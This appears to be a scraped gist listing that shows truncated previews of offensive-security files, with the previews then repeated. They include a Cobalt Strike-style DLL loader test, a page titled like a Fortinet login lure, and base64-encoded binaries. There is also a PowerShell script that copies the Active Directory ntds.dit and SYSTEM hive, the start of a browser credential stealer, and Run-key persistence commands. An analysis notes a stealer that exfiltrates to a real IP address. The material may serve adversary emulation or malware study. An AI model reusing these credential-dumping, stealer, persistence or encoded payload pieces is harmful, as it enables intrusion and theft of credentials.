Toussaint Louverture justaguywhocodes

## cobalt.txt
1. Create a Test DLL Loader
Simulate a benign Cobalt Strike-style DLL loader. Save this as test_loader.c:

c
Copy
#include <windows.h>
// Export a function (common in Cobalt Strike loaders)
__declspec(dllexport) void Run(void) {
    // Benign test action: create a temporary file
    HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\test_ttp_success.txt",

## fortinet.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Fortinet Secure File Access</title>
    <style>
        body {
            margin: 0;
            padding: 0;

## cve.b64
VUVzREJBb0FBQUFBQUdkSTRsSUFBQUFBQUFBQUFBQUFBQUFUQUFrQVExWkZMVEl3TWpFdE1UWTNOUzF0WVdsdUwxVlVCUUFCd3pqZllGQkxBd1FLQUFBQUNBQm5TT0pTV0syVEJVWGRBUUNCdVFJQUpBQUpBRU5XUlMweU1ESXhMVEUyTnpVdGJXRnBiaTlEVmtVdE1qQXlNUzB4TmpjMUxuQnpNVlZVQlFBQnd6amZZS3k2NlpMazFwRW0rbDlQa2MyaFdaTUdrVmdDVy9EZUhodnNPd0piWUZQTEpPeUJ3TDRHZ0psNTk0dXNqVlVpcFpabWJ0U1B6TUJ4UCs3SDNZLzc5NkV5WDlwa0xydjJUV3JYcnNwKzBzdmlNVGZSbVAzaGYvN2g3Zno4di8vdHc0LzN6ODkyb044TVc3Sy9QT0cydnU3S2VYcGpYTzRuQkVMZ24yQ2N3TjUrTU1heW5iL3M5T01mdmloUXkvem94dW1YTHcvZVAweFVaL0diUFdldmFKemZmbnA3ekhNLy9RS0NSVGsvbHZqbnBHdkE1RjFrK2lqeGphN2NQZG8zTVdxYXJrMS9YL1ZkNHBQQUY4MjdwZjd5WDVrQnZ6blRyMGY0bWVWc3hwSU1SN3JwLzJvZzN1cnVORkh2YjNQM0ZxWHBXL1RXWnErUEQ4L3ZUZG1XMHp4R2N6ZCsyWGlac3ZIdGRYcDR5bFp0OTJyZittaWFYdDJZL3Z4MjY5OFQ5NzdmSDkvbVJ6bTlKVkg3Rm1mdk91bTdoV3pMa21YTzN2WnVHZDlPMVMrYkpzczBkODBicTZwZmkwWHQvdGJOajlOZTBxWG4xK2xOZDk2b3V5UGVMTWtKL3RNT2JJZlRmdjRxRUFabFVScm5jTlliTzVack51cFJrMzFaZFI3WlczcytlT3Z5MDduc3cwSDc5MmljKzZjZnhEOEg0WWMweTZPbG5uOTUrODdwNWcvaDBidjVUWXZxTWltN1pmcnV4OSsxcVdldit4bWNmMmp3

## dll.b64
VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUVBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFEYjBkUlRuN0M2QUord3VnQ2ZzTG9BbHNncEFKdXd1Z0FZT2JrQm5MQzZBQmc1dmdHWHNMb0FHRG0vQVkrd3VnQVlPYnNCbUxDNkFPWXh1d0dic0xvQW43QzdBTEd3dWdBTE9iTUJuYkM2QUFzNVJRQ2VzTG9BQ3ptNEFaNnd1Z0JTYVdOb243QzZBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJraGdZQVV2Um9hUUFBQUFBQUFBQUE4QUFpSUFzQ0Rpd0FHQUFBQUNRQUFBQUFBQUJFSEFBQUFCQUFBQUFBQUlBQkFBQUFBQkFBQUFBQ0FBQUdBQUFBQUFBQUFBWUFBQUFBQUFBQUFKQUFBQUFFQUFBQUFBQUFBZ0JnQVFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUJBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFLUTlBQUNNQUFBQUFIQUFBUGdBQUFBQVlBQUFyQUlBQUFBQUFBQUFBQUFBQUlBQUFGZ0FBQUNRTkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQXpBQUJBQVFBQUFBQUFBQUFBQUFBQU1BQUFZQUVBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUFuQllBQUFBUUFBQUFHQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNtUmhkR0VBQURZVEFBQUFNQUFB

## Get-NtdsDit.ps1
#Requires -RunAsAdministrator

# Define paths
$ntdsPath = "$env:SystemRoot\NTDS\ntds.dit"
$systemHivePath = "$env:SystemRoot\System32\config\SYSTEM"
$desktopPath = [Environment]::GetFolderPath("Desktop")
$outputNTDS = Join-Path $desktopPath "ntds.dit"
$outputSystem = Join-Path $desktopPath "SYSTEM"

# Create Volume Shadow Copy

## stealer.py
# raccoon_browser_steal_poc.py
import os
import sqlite3
import shutil
from win32crypt import CryptUnprotectData   # pip install pywin32

def find_browser_paths():
    paths = [
        os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data\Default"),
        os.path.expandvars(r"%LOCALAPPDATA%\Microsoft\Edge\User Data\Default"),

## gsd.b64
VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFaSVlEQUFBQUFBQUFBQUFBQUFBQUFQQUFMZ0lMQWdJaUFQQUxBQUFRQUFBQVVCc0FvRWduQUFCZ0d3QUFBRUFBQUFBQUFBQVFBQUFBQWdBQUJnQUJBQUVBQUFBR0FBRUFBQUFBQUFCZ0p3QUFFQUFBQUFBQUFBTUFZSUVBQUNBQUFBQUFBQUFRQUFBQUFBQUFBQUFRQUFBQUFBQUFFQUFBQUFBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQVVDY0FuQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlZVRmd3QUFBQUFBQlFHd0FBRUFBQUFBQUFBQUFDQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQURnVlZCWU1RQUFBQUFBOEFzQUFHQWJBQURzQ3dBQUFnQUFBQUFBQUFBQUFBQUFBQUFBUUFBQTRGVlFXRElBQUFBQUFCQUFBQUJRSndBQUFnQUFBTzRMQUFBQUFBQUFBQUFBQUFBQUFFQUFBTUF6TGprMkFGVlFXQ0VOSkFnSjlCMmhXbGZ5N0dldUxDY0FkdWdMQUFBMEl3QkpJZ0ErLy8vLy8vOGdSMjhnWW5WcGJHUWdTVVE2SUNJeWJtZFZlVzVN

## gist:bc57be175667f0df8ab47d9862805887
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer" /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f

reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer"

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer" /f

## gist:0fd097b5ef3a0dd6cc233ac020e9ac59
Some analysis:
- The script gathers various system details such as the hostname, platform, home directory, and temporary directory (os.hostname(), os.platform(), os.homedir(), os.tmpdir()).

- It checks for the existence of specific directories and files, particularly those related to web browsers like Chrome, Brave, and Opera. It attempts to read these directories and files, which contain potentially sensitive information (e.g., user profiles, extension data).

- It tries to steal macOS keychains, solana wallet keys.

- The script attempts to upload collected data to a remote server (95.164.17.24) hosted in the Netherlands, indicating data exfiltration. It uses the request module to send POST requests with the stolen data.

- It includes mechanisms to ensure it runs multiple times, possibly to ensure persistence or continued data exfiltration. The script also tries to download and execute additional payloads from the remote server, which could be more malicious scripts or executables.

## trillclient.ps1
# Assume these variables are defined earlier in your script
# $users_path     : Array or collection of user folder names (e.g., @("User1", "User2"))
# $copy_dest_path : Destination root folder (e.g., "D:\Backup\ChromeData")

$copy_dest_path = "C:\Users\Public\EdgeExtract"  # <-- MODIFY THIS
# Create the destination root folder if it doesn't exist
if (-not (Test-Path $copy_dest_path)) {
    New-Item -ItemType Directory -Path $copy_dest_path -Force | Out-Null
}
	1. Create a Test DLL Loader
	Simulate a benign Cobalt Strike-style DLL loader. Save this as test_loader.c:

	c
	Copy
	#include <windows.h>
	// Export a function (common in Cobalt Strike loaders)
	__declspec(dllexport) void Run(void) {
	// Benign test action: create a temporary file
	HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\test_ttp_success.txt",
	<!DOCTYPE html>
	<html lang="en">
	<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Fortinet Secure File Access</title>
	<style>
	body {
	margin: 0;
	padding: 0;
	#Requires -RunAsAdministrator

	# Define paths
	$ntdsPath = "$env:SystemRoot\NTDS\ntds.dit"
	$systemHivePath = "$env:SystemRoot\System32\config\SYSTEM"
	$desktopPath = [Environment]::GetFolderPath("Desktop")
	$outputNTDS = Join-Path $desktopPath "ntds.dit"
	$outputSystem = Join-Path $desktopPath "SYSTEM"

	# Create Volume Shadow Copy
	# raccoon_browser_steal_poc.py
	import os
	import sqlite3
	import shutil
	from win32crypt import CryptUnprotectData # pip install pywin32

	def find_browser_paths():
	paths = [
	os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data\Default"),
	os.path.expandvars(r"%LOCALAPPDATA%\Microsoft\Edge\User Data\Default"),
	reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer" /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f

	reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer"

	reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer" /f
	Some analysis:
	- The script gathers various system details such as the hostname, platform, home directory, and temporary directory (os.hostname(), os.platform(), os.homedir(), os.tmpdir()).

	- It checks for the existence of specific directories and files, particularly those related to web browsers like Chrome, Brave, and Opera. It attempts to read these directories and files, which contain potentially sensitive information (e.g., user profiles, extension data).

	- It tries to steal macOS keychains, solana wallet keys.

	- The script attempts to upload collected data to a remote server (95.164.17.24) hosted in the Netherlands, indicating data exfiltration. It uses the request module to send POST requests with the stolen data.

	- It includes mechanisms to ensure it runs multiple times, possibly to ensure persistence or continued data exfiltration. The script also tries to download and execute additional payloads from the remote server, which could be more malicious scripts or executables.
	# Assume these variables are defined earlier in your script
	# $users_path : Array or collection of user folder names (e.g., @("User1", "User2"))
	# $copy_dest_path : Destination root folder (e.g., "D:\Backup\ChromeData")

	$copy_dest_path = "C:\Users\Public\EdgeExtract" # <-- MODIFY THIS
	# Create the destination root folder if it doesn't exist
	if (-not (Test-Path $copy_dest_path)) {
	New-Item -ItemType Directory -Path $copy_dest_path -Force \| Out-Null
	}